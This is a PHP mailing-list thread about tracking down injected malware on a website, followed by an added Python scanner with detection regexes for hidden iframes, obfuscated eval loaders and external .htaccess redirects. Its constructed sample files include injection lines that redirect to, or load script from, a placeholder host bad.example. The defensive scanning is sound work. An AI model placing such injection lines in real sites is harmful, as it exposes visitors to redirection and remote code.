Re: Malware Question

On 4/28/2010 7:50 PM, Ashley Sheridan wrote:
Hi all,

This isn't exactly a PHP question, but I don't know anyone else with the
collected smarts of this list. Basically, a site I built and am managing
has been identified by Google as a source of malware. Now, I've been
over the source code with a fine-toothed comb and found nothing, I've
gone over the HTML output for anything suspicious, checked every single
Javascript file out, looked to see the server headers are correct and
aren't malformed, checked the .htaccess is as expected and have run the
site against the unmask parasites website which found no problems except
the 'suspicious' listing which Google has given it.

The Google webmaster tools tell me nothing more than 'Of the 2 pages we
tested on the site over the past 90 days, 2 page(s) resulted in
malicious software being downloaded and installed without user consent.'
It won't tell me what pages, although it tells me that the malicious
software is hosted on one domain and tells me what it is. Needless to
say I can't find that domain string anywhere in the code. I can't find
any hidden iframe tags or hidden Javascript eval() statements.

Basically now, although this is totally beyond my control, the owner of
the site is expecting me to get this sorted asap. I want to, and have
spent the entire day today looking at it, but have really come to the
point where I'm coming unstuck. I can find nothing wrong with the site
at all.

Does anyone have any helpful advice for this sort of thing? Tools that I
can use to check out the site with, or any bit of information that I can
use to fix this? I can give the URL of the site to anyone off-list if
they wish to check it out.

Thanks,
Ash
http://www.ashleysheridan.co.uk



Ross had a good suggestion about planted links to external malicious sites. One of the sites I worked on a couple of years ago had this happen. They asked me to look into it.

There were about 90 htaccess files that redirected the user to a malicious site whenever there was an error, 404 etc.

About 400 html files had a javascript appended on the end that sent the visitor's IP and the file's complete URL to a website in Russia.

About 300 php files had some php code that generated html code that likewise sent the visitor's IP and the file's complete URL to a website in Russia.

About 75 implanted php stand-alone files that were very sophisticated file manipulators. It would have taken me days to figure out exactly what they were doing.

A couple of years ago I was involved in cleansing a site and wrote a script for searching it. It uses regex search patterns.

Wild cards "*", covering all directories and leading text, are assumed before the filename. However, you must include an extension or append "*" to your filename. Can use "*.htaccess"

It lists all the files meeting the criteria e.g.,

Sel File     Size[bytes] File Time 	DirPerms Del DirOwner Dir Time
1  /.htaccess 942    8Aug09 14:33:06    0750 	 *   system   17Apr10 20:38:56 	

You can select a file and view its source including an htmlentities() version
And select one or a batch to delete.

Has a convenient notepad to record your result stats and add a note. e.g.

1Apr09 21 files; "*.htaccess" => "\*" Addition htaccess files added, OK
19Jul08 6 files; "*.htaccess" => "\*"

Has good PW protection, etc.

Easy to install, one file, instructions at the top.

I'll send you a zip if you reply and send me addr.

Al...........
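The thread describes the same cleanup problem from two sides: Ashley cannot find Google's reported domain anywhere in the source, and Al's experience was that the injections hide in .htaccess error redirects, script blocks appended after the closing HTML tag, and obfuscated PHP. The script below is an added example for this archive page, not Al's tool; it walks a web root with a handful of heuristic regexes for those injection styles and also searches for a reported domain in its plain, `\x`-escaped, `%`-escaped and bare-hex forms, which is one reason a plain grep for the domain string comes up empty. The sample files, the `bad.example` domain and the `www.example` trusted host are all constructed placeholders.

```python
"""
Heuristic scan of a web root for injected content of the kinds discussed in
the thread. Added example, not the script Al describes. All sample file
contents, domains and rule names below are constructed for illustration.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, Iterable, Iterator, List


@dataclass
class Finding:
    path: str
    rule: str
    line: int
    snippet: str


# (label, file-name suffixes the rule applies to, pattern). These are
# heuristics for manual review, not signatures: every hit needs a human look.
RULES = [
    # ErrorDocument / Redirect / RewriteRule pointing at an external host.
    ("htaccess-external-redirect", (".htaccess",),
     re.compile(r"^[ \t]*(?:ErrorDocument\s+\d{3}|RewriteRule\s+\S+|Redirect(?:Match)?(?:\s+\d{3})?\s+\S+)"
                r"\s+https?://(?P<host>[^/\s]+)", re.I | re.M)),
    # iframe with zero size or hidden styling.
    ("hidden-iframe", (".html", ".htm", ".php"),
     re.compile(r"<iframe[^>]*(?:width\s*=\s*[\"']?0|height\s*=\s*[\"']?0|"
                r"display\s*:\s*none|visibility\s*:\s*hidden)", re.I)),
    # eval() wrapped around a decoding function, the classic obfuscated loader.
    ("obfuscated-eval", (".php",),
     re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    # A script block tacked on after the document already ended.
    ("script-appended-after-html", (".html", ".htm"),
     re.compile(r"</html>\s*<script\b", re.I)),
    # document.write(unescape(...)) used to assemble a script/iframe tag.
    ("document-write-unescape", (".html", ".htm", ".php", ".js"),
     re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)),
]


def domain_variants(domain: str) -> Iterator[str]:
    """Yield the plain domain and the encodings an injected loader commonly uses."""
    raw = domain.encode()
    yield domain
    yield "".join("\\x%02x" % b for b in raw)   # JavaScript "\x62\x61..." string
    yield "".join("%%%02X" % b for b in raw)    # unescape('%62%61...') form
    yield "".join("%02x" % b for b in raw)      # bare hex, as fed to hex2bin()


def _line_of(text: str, pos: int) -> int:
    return text.count("\n", 0, pos) + 1


def _snippet(text: str, pos: int, width: int = 60) -> str:
    return text[pos:pos + width].splitlines()[0] if text[pos:pos + width] else ""


def scan_files(files: Dict[str, str], bad_domains: Iterable[str] = (),
               trusted_hosts: Iterable[str] = ()) -> List[Finding]:
    """Apply RULES and the domain search to an in-memory {path: content} map."""
    trusted = {h.lower() for h in trusted_hosts}
    indicators = [(d, v.lower()) for d in bad_domains for v in domain_variants(d)]
    findings: List[Finding] = []
    for path, text in files.items():
        name = os.path.basename(path).lower()
        for label, suffixes, pattern in RULES:
            if not name.endswith(suffixes):
                continue
            for m in pattern.finditer(text):
                host = m.groupdict().get("host")
                if host and host.lower() in trusted:
                    continue  # redirect to the site's own host: normal config
                findings.append(Finding(path, label, _line_of(text, m.start()), _snippet(text, m.start())))
        lowered = text.lower()
        for domain, variant in indicators:
            pos = lowered.find(variant)
            if pos != -1:
                findings.append(Finding(path, "bad-domain:" + domain, _line_of(text, pos), _snippet(text, pos)))
    return findings


def scan_tree(root: str, max_bytes: int = 2 * 1024 * 1024, **kw) -> List[Finding]:
    """Read every regular file under root (skipping very large ones) and scan it."""
    files: Dict[str, str] = {}
    for dirpath, _dirs, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            try:
                if os.path.getsize(p) > max_bytes:
                    continue
                with open(p, "r", encoding="utf-8", errors="replace") as fh:
                    files[p] = fh.read()
            except OSError:
                continue
    return scan_files(files, **kw)


# Constructed sample site modelled on the injections Al lists (not real files).
SAMPLE_FILES = {
    "/site/.htaccess": "Options -Indexes\nErrorDocument 404 http://bad.example/404.php\n",
    "/site/index.html": "<html><body>Hello</body></html>\n"
                        "<script>document.write(unescape('%3Cscript src=%22http://bad.example/c.js%22%3E'))</script>\n",
    "/site/lib/helper.php": "<?php\n// real code\nfunction f(){}\neval(base64_decode('aGVsbG8='));\n",
    "/site/about.html": "<html><body>Clean page</body></html>\n",
    "/site/img/.htaccess": "Redirect /old https://www.example/new\n",
}

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:   # usage: scan.py /path/to/webroot reported.domain ...
        found = scan_tree(sys.argv[1], bad_domains=sys.argv[2:])
    else:
        found = scan_files(SAMPLE_FILES, bad_domains=["bad.example"], trusted_hosts=["www.example"])
    for f in found:
        print(f"{f.path}:{f.line}: {f.rule}: {f.snippet}")
```

Run it with no arguments to see the constructed sample flagged; with a web root and the domain Google reported as arguments, it prints one line per hit for manual review. Sorting the output by file modification time, as Al's "File Time" column does, is a useful next step: injected files usually share one timestamp that does not match the rest of the deployment.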

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php